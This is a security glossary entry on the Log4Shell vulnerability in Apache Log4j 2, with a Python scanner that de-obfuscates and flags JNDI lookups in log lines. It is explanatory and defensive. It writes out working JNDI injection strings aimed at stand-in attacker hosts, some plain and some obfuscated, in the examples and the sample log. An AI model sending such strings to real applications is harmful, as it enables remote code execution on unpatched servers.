Vulnerabilities
Log4Shell (CVE-2021-44228)
Also known as: CVE-2021-44228, Log4j vulnerability
Definition
A critical (CVSS 10.0) remote code execution vulnerability in Apache Log4j 2, publicly disclosed in December 2021. Affected versions (2.0-beta9 through 2.14.1) performed lookup substitution on the text of logged messages, so an attacker who could get a string such as ${jndi:ldap://attacker.com/x} written to a log caused the application to perform a JNDI lookup against an attacker-controlled server and load the Java class or serialized object it returned. Apache first addressed it in Log4j 2.15.0; follow-up issues (CVE-2021-45046, CVE-2021-45105) led to 2.16.0 and 2.17.0.
Examples
- Sending the header User-Agent: ${jndi:ldap://attacker.com/x} to a Java web app that logs request headers; the app's JNDI lookup contacts the attacker's LDAP server, which points it at a remote class the JVM loads and runs (or, on JDKs that block remote codebases, returns a serialized object that triggers a gadget chain already on the classpath), giving the attacker a reverse shell.
- Exploiting an internal Java service that logs a username field: the malicious value is entered in an upstream form and reaches the vulnerable logger without the attacker ever connecting to the service directly.
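Detection logic for the two examples above, added here as an illustration and not code from the original page or from Apache Log4j: a small Python scanner that first undoes the nested-lookup obfuscation attackers used to evade naive matching on "jndi:ldap" (forms such as ${${lower:j}ndi:...} and ${${::-j}ndi:...}), then reports the canonical payload per log line. The resolver is a deliberate simplification of Log4j's substitutor, modelling only the lower, upper and default-value lookups; it never performs a network lookup. The access-log lines and host names are constructed sample data.

```python
"""Find Log4Shell-style JNDI lookups in logged input, including obfuscated ones.

Added example, not Log4j's own code. It models, in simplified form, the
recursive lookup substitution that Log4j 2 <= 2.14.1 applied to logged
messages, so obfuscated payloads can be normalised before matching.
Modelled lookups: ${lower:X}, ${upper:X}, and the default-value form
${name:-default} (so ${::-j} resolves to "j"). No network lookup occurs.
"""
import re

# Innermost ${...} lookups: a body containing no further "$", "{" or "}".
_INNER = re.compile(r"\$\{([^${}]*)\}")
# A canonical JNDI lookup as emitted by _resolve_one().
_JNDI = re.compile(r"\$\{jndi:[^}]*\}")


def _resolve_one(body: str) -> str:
    """Evaluate one non-nested lookup body (the text between '${' and '}')."""
    # "<lookup>:-<default>": an empty or unknown lookup yields the default,
    # which is how "${::-j}" becomes "j".
    if ":-" in body:
        lookup, default = body.split(":-", 1)
    else:
        lookup, default = body, None
    kind, _, arg = lookup.partition(":")
    kind = kind.lower()  # Log4j matched lookup names case-insensitively
    if kind == "lower":
        return arg.lower()
    if kind == "upper":
        return arg.upper()
    if kind == "jndi":
        # Keep it, in canonical lower-case form, so the matcher sees it.
        return "${jndi:" + arg + "}"
    if default is not None:
        return default
    return "${" + body + "}"  # unmodelled lookup (env, sys, ...): leave as-is


def resolve_lookups(value: str, max_passes: int = 20) -> str:
    """Substitute innermost lookups repeatedly, as Log4j 2 did recursively."""
    for _ in range(max_passes):
        new = _INNER.sub(lambda m: _resolve_one(m.group(1)), value)
        if new == value:
            break
        value = new
    return value


def extract_jndi(value: str) -> list[str]:
    """Return every JNDI lookup present in `value` after de-obfuscation."""
    return _JNDI.findall(resolve_lookups(value))


def scan_log(lines):
    """Return (line_number, [payloads]) for each line carrying a JNDI lookup."""
    hits = []
    for n, line in enumerate(lines, 1):
        payloads = extract_jndi(line)
        if payloads:
            hits.append((n, payloads))
    return hits


# Constructed sample access-log lines (combined format); not real traffic.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:13:02:11 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:13:02:12 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://attacker.example/x}"',
    '10.0.0.9 - - [10/Dec/2021:13:02:13 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:l}dap://attacker.example/x}"',
    '10.0.0.9 - - [10/Dec/2021:13:02:14 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://attacker.example/y}"',
    '10.0.0.7 - - [10/Dec/2021:13:02:15 +0000] "GET /?q=${env:HOME} HTTP/1.1" 200 512 "-" "curl/7.79"',
]

if __name__ == "__main__":
    for n, payloads in scan_log(SAMPLE_LOG):
        print(f"line {n}: {payloads}")
```

Lines 2, 3 and 4 of the sample are flagged with the same canonical payload shape even though only line 2 contains the literal text "jndi:ldap"; line 5 carries a lookup in user input but no JNDI reference and is not flagged. Matching like this is a detection and triage aid only; the fix for Log4Shell is upgrading Log4j 2 to a release where message lookups and JNDI are removed or disabled by default.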
Related terms
CVE (Common Vulnerabilities and Exposures)
A public catalogue that assigns a unique identifier to each disclosed software or hardware vulnerability so they can be referenced unambiguously across the industry.
Zero-Day Vulnerability
A security flaw that is unknown to the vendor (or for which no patch yet exists) at the moment it is discovered or exploited.
Insecure Deserialization
A vulnerability where an application deserialises untrusted data, letting attackers instantiate arbitrary objects and frequently achieve remote code execution. The JNDI vector in Log4Shell is one route to it: the attacker's LDAP server can answer with a serialized Java object whose deserialization in the victim JVM triggers a gadget chain already on the classpath.
Supply Chain Attack
An attack that compromises a trusted third-party software, hardware, or service provider in order to reach its downstream customers. Log4Shell is often discussed alongside this term because Log4j 2 is a transitive dependency of a vast number of products, so many organisations were exposed through software they did not know contained it.
Exploit
A piece of code, data, or technique that takes advantage of a vulnerability to cause unintended behaviour such as code execution, privilege escalation, or information disclosure.
Known Exploited Vulnerability (KEV)
A CVE that the U.S. CISA has confirmed is being actively exploited and has added to its public KEV Catalog; under Binding Operational Directive 22-01 this triggers remediation deadlines for U.S. federal agencies. CISA added CVE-2021-44228 to the catalog on 10 December 2021, within a day of public disclosure.